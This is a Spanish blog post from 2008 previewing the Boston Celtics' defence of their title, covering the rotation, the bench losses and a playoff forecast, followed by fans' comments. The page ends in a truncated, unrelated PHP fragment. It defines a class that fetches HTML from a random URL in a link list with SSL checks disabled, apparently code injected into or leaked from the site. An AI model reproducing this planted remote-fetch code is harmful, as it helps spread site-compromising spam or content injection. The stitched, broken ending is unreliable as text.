Boston Celtics: Máxima exigencia

27 de October de 2008 por Jabho

Dos decadas de espera y una final para el recuerdo han hecho del decimoséptimo campeonato de Boston una dulce, muy dulce, victoria. Pero ya lo dice el refranero español, que si difícil es llegar, más difícil es mantenerse.

Es un hecho que al formar el Big Three se formaba un proyecto ambicioso cuyo objetivo debía ser un campeonato en un ciclo que se presumía corto, de 3 ó 4 años máximo. La edad de Allen, Pierce y Garnett, además del fracaso de otros proyectos que también habían acumulado all stars en busca del anillo, levantaron voces escépticas en torno a este proyecto. Pero así como la derrota genera dudas aun habiendo hecho bien tu trabajo, ganar el campeonato ha supuesto cumplir el objetivo a las primeras de cambio y deja un poso de seguridad y confianza en el equipo, así como le marca el nuevo objetivo. Y es que un equipo campeón sólo puede tener un objetivo: Back-to-back.

La defensa del título es un objetivo que no han conseguido los 6 últimos campeones, lo que deja bien claro que no es nada fácil. Tampoco lo será para unos Celtics que se presentan sin demasiadas novedades en la plantilla aunque con alguna que otra ausencia destacada.

Doc Rivers seguirá entrenando al equipo. Con la ayuda de sus estrellas, Doc consiguió involucrar a todos sus jugadores en ambos lados de la cancha e hizo de Boston la mejor defensa del campeonato. El ataque, sin egos que alimentar, fue versátil, aprovechando las cualidades de cada jugador y sin generar excesiva dependencia de las estrellas. Además, en la final superó tácticamente en todo momento al maestro Zen, despejando todas las dudas que aún quedaran sobre él. Se espera, y se le pedirá, que el equipo siga jugando igual, sacrificado en defensa y generoso en ataque. Fue la clave del anillo y es el camino para el más difícil todavía.

En cancha y de inicio todo sigue igual: Rondo, Allen, Pierce, Garnett y Perkins.

Rondo debe seguir la linea mostrada el año pasado de buena defensa, buenos fundamentos, gran madurez y capacidad de aportar en casi todos los aspectos del juego. Y seguir mejorando ese tiro que le aleja de ser uno de los mejores de la liga. Comparte backcourt con Ray Allen. Ray, del que sabíamos lo que podía aportar en ataque, nos sorprendió mostrándose como un extraordinario defensor. A la sombra de Pierce y Garnett, los peores momentos del equipo, las series contra los Cavs, vinieron cuando peor estuvo él, demostrando cuán importante es su aportación en ataque. Por eso, y dado que los años pesan, no debería sorprendernos que juegue poco más de 30 minutos en la regular y baje un poco más sus números.

En las alas jugarán Paul Pierce y Kevin Garnett. El capitán y el alma de este equipo. Ambos aportaran carácter, compromiso y liderazgo. Garnett, uno de los mejores ala pívots de la historia, consiguió desde una defensa contagiosa el Anillo, y así quitarse la fama de perdedor. Pierce, capaz de hacer de todo en ataque, además recuperó un respeto que quizás había perdido las últimas temporadas. Ambos se hicieron hueco mutuamente, y le hicieron hueco a Ray y al resto, para demostrar que un equipo es más que la suma de sus individualidades.

El pívot seguirá siendo Perkins. Año a año mejora su rendimiento. Sobrio, buen defensor aunque con tendencia a cargarse de faltas y consciente de sus limitaciones ofensivas, es un buen jugador de equipo.

Al mirar al banco es donde se notan las ausencias. Allí desde donde salían Posey y PJ Brown para aumentar, si cabe, el nivel de la defensa y aportar su saber estar en ataque. Son ausencias importantes, sin duda, pero no definitivas. Boston impuso el año pasado su sentido colectivo del juego y debe seguir por el mismo camino. Y no debemos descartar que allá por febrero algún veterano (¿PJ de nuevo?) se una al equipo en busca del Anillo.

Lleguen o no refuerzos, el banquillo de Boston tiene cosas que aportar, al menos durante la regular. Si las lesiones le respetan, cosa que no ha pasado hasta ahora, Tony Allen será posiblemente el 6º hombre del equipo. Sobre sus hombros recaerá la tarea de hacer olvidar a Posey. Mas allá de comparaciones se trata de un buen defensor y capaz de aportar en ataque, sobre todo en penetraciones o 1 contra 1. Sam Cassell, talento y veteranía, será el suplente de Rondo, Eddie House aportará su tiro exterior en la 2ª unidad mientras por dentro la energía de Leon the Show Powe y la fuerza de Big Davis disfrutarán de bastantes minutos. Completarán el roster un puñado de jugadores jóvenes, proyectos interesantes pero todavía verdes: Pruitt, Giddens, O´Brien y Walker.

Éstos son, por ahora, los encargados de defender el título. Pero la posibilidad de ganar atraerá casi sin duda nuevos compañeros de viaje según avance la temporada.

Boston debe jugar la regular de una forma distinta a la que juraron el año pasado. Entonces había mucho que demostrar, demostrarse, pero eso se ha superado. El equipo debe dosificarse y saber que no son necesarias 66 victorias, que con 55-60 puede valer si llegas en tu mejor momento de forma a la post temporada.

Luego los Playoffs son otra cosa. Ahí llega el momento de apretar los dientes, mirar el escudo y levantar la mirada para ver la herencia que cargan sobre sus hombros: las camisetas de algunos de los mejores jugadores de la historia y 17 títulos; entre ellos, el último, el que defienden.

Por eso, para los Allen, Pierce y Garnett sólo vale ganar. Porque un título apunta tu nombre en los libros, pero el recuerdo y los corazones de los orgullosos verdes está poblado de victorias, de héroes, de leyendas. Ése es el legado que reciben y en sus manos está el que dejan. La exigencia es máxima.

Quinteto inicial: Rajon Rondo, Ray Allen, Paul Pierce, Kevin Garnett y Kendrick Perkins.

Sexto hombre: Tony Allen.

Pronóstico: Finales de Conferencia contra Cavs, y si pasan, campeones.

Comenta

6 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Son los campeones y el equipo a batir, no hay duda. Da la impresión de que en la regular season bajarán un punto el pistón, y ojo que eso les puede costar algo tan valioso (especialmente en el Este) como el factor cancha. Echarán de menos a Posey en los Playoffs, pero no hasta entonces, que al fin y al cabo sólo es Posey. A ver si Rondo sigue mejorando, si empieza a anotar un poco de lejos, y si se incorpora alguien más durante el año. Pero bueno, es un equipo con pocos interrogantes, o al menos de poca importancia, porque el trío va a rendir sí o sí, y entre esos tres ya te conviertes en candidato a todo.

    Mi pronóstico es que necesitan quedar primeros en RS para ganar la conferencia. Creo que lo lograrán, y que esta vez ¡¡OS GANAREMOS!! 😀

      Citar

  2. TheDeerHunter dice:
    #2

    Primero las flores: Máxima exigencia… por supuesto. Los iconos perfectos del orgullo céltic que todos deberíamos admirar. Representan el baloncesto en estado puro: esfuerzo, humildad, implicación, capacidad de sacrificio, sentido colectivo de juego, talento individidual al servicio del equipo… todo eso es algo que quizás nos habíamos olvidado que existía y ellos nos lo han recordado de la mejor manera posible.

    Ahora las no flores: Os ganaremos!!! Llamad a este post el MAS DIFÍCIL TODAVÍA. El paseo militar que debió ser el año pasado no lo fue ni de lejos. Ahora vosotros estáis peor y nosotros mejor.
    Todos estárán al degüello. Detroit, Cavs, Orlando. El año pasado fue difícil llegar a la final, pero este año se va a sudar sangre, también por el teóricamente más fácil camino del Este.

    Si lo conseguís, al otro lado os esperarán quien deben de esperaros. Pero esta vez con todas nuestras armas bien limpias y engrasadas. La fiebre amarilla a vuelto para quedarse.

      Citar

  3. Jabho dice:
    #3

    Creo que el equipo de Boston está un punto por debajo de Lakers, bueno en realidad creo que todos los equipos están un punto por debajo de los Lakers, pero creo que no os convenimos en la final.

    El año pasado os ganamos mas por carácter que por baloncesto. Eso de que los Lakers llegaron mas fundidos no lo veo, la verdad. Diría que la final se escapó en dos detalles, que fue el mal momento físico de Fisher y falta de un agresividad sobre todo en la zona. Boston le comió la moral a los LA y volver a verlos levantará los fantasmas de que remontaron veintitantos y ganaron el 6º de paliza. Os conviene otra final.

    Me dan muchísimo miedo los Cavs. De hecho yo apuesto por un campeón del Este. A Posey lo echaremos de menos pero necesitamos a PJ si o si. La rotación de Boston vale para la regular pero en los PO necesitaremos algo más.

    Lo de ganar la regular es importante pero según para quien. Para Boston lo fue el año pasado pero no este. Ni para Lakers. Te da un plus de seguridad que necesitaran Rockets o NO o Cavs, pero equipos hechos tipo Boston, Detroit o SA no lo veo.

      Citar

  4. TheDeerHunter dice:
    #4

    ¿me estás diciendo que la causa de que perdieran la final los Lakers fue Fisher??? XD
    Obviamente el carácter de Boston en la final fue decisivo, sobre todo porque a base de echarle pelotas supieron mantener el nivel físico del que ya ni siquiera ellos iban sobrados… pero era por ahí por donde ellos sabían que podían hacerle daño a los Lakers. Sin la superioridad física que lograron alcanzar hubieran palmado sí o sí.
    ¿de los fantasmas?? Más fantasmas que debían tener en la cabeza los célebres “perdedores” del Big Three no los van a tener estos Lakers. Siempre será duro para nosotros jugar en Boston pero a los fantasmas se los exorciza jugando bien. A mí no me cabe ninguna duda de que estos Lakers son capaces de hacerlo. Después que gane el mejor.

    En el este no lo tengo tan claro. Pero en el Oeste la diferencia en los cruces de quedar campeón de conferencia puede ser significativa. El año pasado los Lakers se ahorraron una eliminatoria vital con Denver. Después se vió esa importancia cuando los Spurs no podían ni con su ojete.

      Citar

  5. portu dice:
    #5

    En el tema Posey estoy de acuerdo en que quizás no sea demasiado importante durante la Regular, además, gran parte de sus minutos fueron en la posición de 4, sobretodo cuando Powe no entraba en las rotaciones. Creo q el incremento en la aportación de powe y lo q evolucione G. Davis, aparte de lo q pueda aportar P. O´Bryant son refuerzos suficientes para el juego interior. El problema vendría si T. Allen vuelve a lesionarse, ahí sí nos quedaríamos en bragas en la posición de 2-3 y empezaríamos a ver inventos como Rondo y House juntos, demasiados minutos de Allen y Pierce, quizás a jóvenes por ahí… y si no sale bien esos problemas se acentuarían en playoffs.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Lo de la lesión de Marbury no sale en Rotoworld ¿Por qué?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>